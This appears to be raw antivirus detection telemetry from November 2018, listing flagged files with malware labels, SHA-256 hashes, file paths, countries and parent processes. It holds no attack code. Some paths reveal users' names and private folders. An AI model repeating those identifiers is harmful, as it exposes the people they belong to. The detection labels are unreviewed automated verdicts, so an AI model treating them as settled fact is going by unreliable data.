  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe769_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe769 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T19:22:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ccminer.exe', filepath='E:\\避難先\\ccminer-djm34-mod-r1 予備\\ccminer.exe', filesize=61632000, name='HEUR/AGEN.1031883.#M1.#R1'), hash='9d283ec8daef71b6046fdaa78a46501be335d3612b6583f5b8d454529be780c2', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T10:31:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A674F9F961326D1B73E7B83DA09747F4311E064DD20E3F7D21952305944C54FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:33:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:46:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='8577329.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Name\\8577329.VIR', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:45:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='htccalc.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:47:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:13:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T20:08:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163549-38ec3d9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-163549-38EC3D9B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:35:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215808-cba352ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215808-CBA352EE', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221143-5e7931a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-221143-5E7931A2', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:11:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102421-bdd34d7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102421-BDD34D7C', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:16:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B084CF08163B6768B9FB5FDC15569B7EE9A4720CFB3518E16787DCC28140D003', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T14:19:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174750-ca63c417', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e09dc19c\\AVSCAN-20181104-133548-4D3A2C82\\AVSCAN-20181104-174750-CA63C417', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:47:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T11:05:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132423-8ccf8064', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8748c67e\\AVSCAN-20181104-120656-00F74416\\AVSCAN-20181104-132423-8CCF8064', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:24:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unwise.exe', filepath='E:\\softver\\ACDSee32\\ACDSee32\\UNWISE.EXE', filesize=128000, name='TR/Crypt.XPACK.xmlc.#M0.#R0'), hash='726e00baf21c0a5711af912bdc6e5874030a35b741b3960fc5e6bbbed148a0e1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:05:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055500-43db8c48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055500-43DB8C48', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\SoftwareDistribution\\Download\\833ec6ee1bc11248456e8d9954c14265\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23930_none_75d1609092e92648\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='347efc35f5786537fcb429a95231a5c5af570d40c3c48ccbc3e794ba27354dce', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T13:10:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maker.exe', filepath='C:\\Program Files (x86)\\IDUTEX\\Vpecker\\SCAN\\EUROPE\\VW\\SP\\MAKER.EXE', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='c6a25db0fae3180b2b09af9076f09caa1c22081a4f85de5d231082cb1bc2399e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:ZaevZSlePUmtR8mT.1', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T00:47:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nso871D.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:32:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ipl 2018.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa5908.33855\\crack\\ipl 2018.exe', filesize=192000, name='SPR/DllInject.8a2eba.#M1.#R1'), hash='8a2eba19c9861cdd247cbaa3021504d5314d76a8e89b2036a2866a10a40c0d96', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=2189768, timestamp='2018-11-02T03:45:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-230642-39071cee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_51ec643d\\AVSCAN-20181102-230559-35822134\\AVSCAN-20181102-230642-39071CEE', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:06:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7CA69BCFE251EAE221B6D707D7C1DD00789BD9D1016DB898BC914FFD5ECE4079', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7ca69bcfe251eae221b6d707d7c1dd00789bd9d1016db898bc914ffd5ece4079', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='\\\\?\\I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00658d92', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp00658d92', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:45:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-u -p 2312 -s 3420', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T04:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081544-3ed02478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081544-3ED02478', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nse9F33.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T18:11:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\NTServices\\mSiexec64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:37:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='H:\\org mmak\\org\\org 2014\\yessssss net\\2014\\InterNet Download Manger 2014\\ArabSeeD.CoM.IDM.6.18.b7.AhMeD00FaWzY\\Internet Download Manager 6.18 Build 7 Retail\\Crack 2\\Patch.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R1748'), hash='915ab88f04e7d2f0055d60f2c76284852abf31ac7f57d96c87a72b33b68cc46f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu(1).html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Sengketa tanah - hukumonline.com_files\\lY4eZXm_YWu(1).html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='f4ed476dd0bb7b9fc35c8c2334e1404d3b70ce957bdfb9884fd8e4b865e95cef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='\\\\?\\c:\\windows\\system32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:18:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213543-e481a564', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_956d8945\\AVSCAN-20181102-210357-9072E9CB\\AVSCAN-20181102-213543-E481A564', filesize=20000, name='DR/FakePic.Gen.#M1.#R1'), hash='e4d2c1791fd26ad14c122fe06186c729fbffa96dcb06a4fc67ccf867de1b88bd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:35:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175440-dcf37fc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6cc3e2a4\\AVSCAN-20181102-174957-BA826308\\AVSCAN-20181102-175440-DCF37FC1', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='d07d13f6ada258f7cd7cc415aa56e2f7e73f1d2688a1274a217b241f004fd37e', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:51:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jdchkqoz.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\JdChkQOZ.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093953-7b7cc757', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a7773cb\\AVSCAN-20181102-093936-78D12C7E\\AVSCAN-20181102-093953-7B7CC757', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='90cda131317b2ce9a36c1a648ca3d290a706374e27f24ee44cd721efef59561a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:39:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='D:\\CLIPGRAB-3.6.8-CGORG.EXE', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T15:31:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094241-140af601', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d2d42113\\AVSCAN-20181102-094153-0BCFFE34\\AVSCAN-20181102-094241-140AF601', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:42:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:45:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110807-c85d10fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110807-C85D10FA', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='st5.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ST5\\ST5.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='daae94b24cc0953acc0981f8c6ffb0e3b439c394f41f3a31e19f5cf11b05b7c2', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^&.{835c4fc4-93e9-4ece-88f9-9840d9f065b6}', filepath='G:\\\xa0\\^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^&.{835C4FC4-93E9-4ECE-88F9-9840D9F065B6}', filesize=6316000, name='TR/Taranis.2868.#M1.#R1'), hash='e0400f335c404c66c9b3d8704fac9f00b4e3d21150131d5b241a4f76e62744b6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bg.exe', filepath='F:\\lok tihar 2018\\bg\\bg.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filepath='H:\\{b3472fcc-224a-2bc9-a158-42418a120920}\\dc1d054f-8bb2-4127-4032-de83852c2cd9.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbcc46f6f225bfea3e6f0d3591dfedeb8e75cba2d30c044b348281947745bbe2', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064713-7af8bff1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-064713-7AF8BFF1', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:10Z'), dt=datetime.date(2018, 11, 2)),
